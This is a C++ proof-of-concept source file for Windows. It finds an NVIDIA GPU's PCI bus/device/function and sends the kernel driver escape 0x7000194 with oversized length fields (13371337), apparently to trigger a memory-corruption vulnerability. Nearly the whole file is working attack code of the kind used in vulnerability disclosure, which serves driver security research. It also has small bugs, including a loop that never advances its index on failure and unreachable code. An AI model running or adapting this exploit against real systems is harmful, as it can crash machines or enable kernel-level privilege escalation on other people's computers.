// gpu_poc.cpp : Defines the entry point for the console application.
//

#include "stdafx.h"
#include <windows.h>
#include <setupapi.h>

#include <initguid.h>
DEFINE_GUID(GUID_DEVCLASS_DISPLAY, 0x4D36E968, 0xE325, 0x11CE, 0xBF, 0xC1, 0x08, 0x00, 0x2B, 0xE1, 0x03, 0x18);

#include "Gpu.h"

struct Escape7000194ExtraData {
  BYTE unknown_0[4];
  DWORD unknown_1;
  DWORD unknown_2;
  DWORD unknown_3;
  DWORD unknown_4;
  BYTE unknown_5[76];
};

struct Escape7000194Data {
  DWORD bdf;
  DWORD unknown_1;
  Escape7000194ExtraData data;
  DWORD size_0;
  BYTE buf_0[4096];
  DWORD size_1;
  BYTE buf_2[8];
};

using Escape7000194 = NvEscape<Escape7000194Data>;

static_assert(sizeof(Escape7000194) == 0x10a8, "escape size");

DWORD GetNvidiaBdf() {
  HDEVINFO dev_info = SetupDiGetClassDevs(
    &GUID_DEVCLASS_DISPLAY,
    nullptr,
    nullptr,
    DIGCF_PRESENT);
  
  if (dev_info == INVALID_HANDLE_VALUE) {
    return 0;
  }

  SP_DEVICE_INTERFACE_DATA interface_data;
  DWORD index = 0;
  interface_data.cbSize = sizeof(interface_data);

  SP_DEVINFO_DATA data;
  data.cbSize = sizeof(SP_DEVINFO_DATA);
  while (SetupDiEnumDeviceInfo(dev_info, index, &data)) {
    DWORD bus;
    if (!SetupDiGetDeviceRegistryProperty(dev_info, &data, SPDRP_BUSNUMBER,
                                          nullptr, reinterpret_cast<PBYTE>(&bus),
                                          sizeof(bus), nullptr)) {
      continue;
    }

    DWORD address;
    if (!SetupDiGetDeviceRegistryProperty(dev_info, &data, SPDRP_ADDRESS,
      nullptr, reinterpret_cast<PBYTE>(&address),
      sizeof(bus), nullptr)) {
      continue;
    }

    DWORD function = address & 0xffff;
    DWORD device = address >> 16;

    // not entirely sure about the order here.
    return bus << 8 | device << 4 | function;
    ++index;
  }

  return 1;
}

int main() { 
	Gpu gpu;
	if (!gpu.Init()) {
		fprintf(stderr, "Failed to init gpu.\n");
		return 1;
	}

  Escape7000194 escape(0x7000194, 0x4e562a2a);
  escape.data.bdf = GetNvidiaBdf();
  escape.data.data.unknown_3 = 2;
  escape.data.size_0 = 13371337;
  escape.data.size_1 = 13371337;
  escape.data.data.unknown_1 = 0x60;
  
  escape.data.data.unknown_4 = 1;
  if (!escape.data.bdf) {
    fprintf(stderr, "Failed to find bus device function for gpu.\n");
    return 1;
  }

  if (gpu.Escape(&escape, sizeof(escape))) {
    fprintf(stderr, "Failed escape.\n");
    return 1;
  }
	return 0;
}

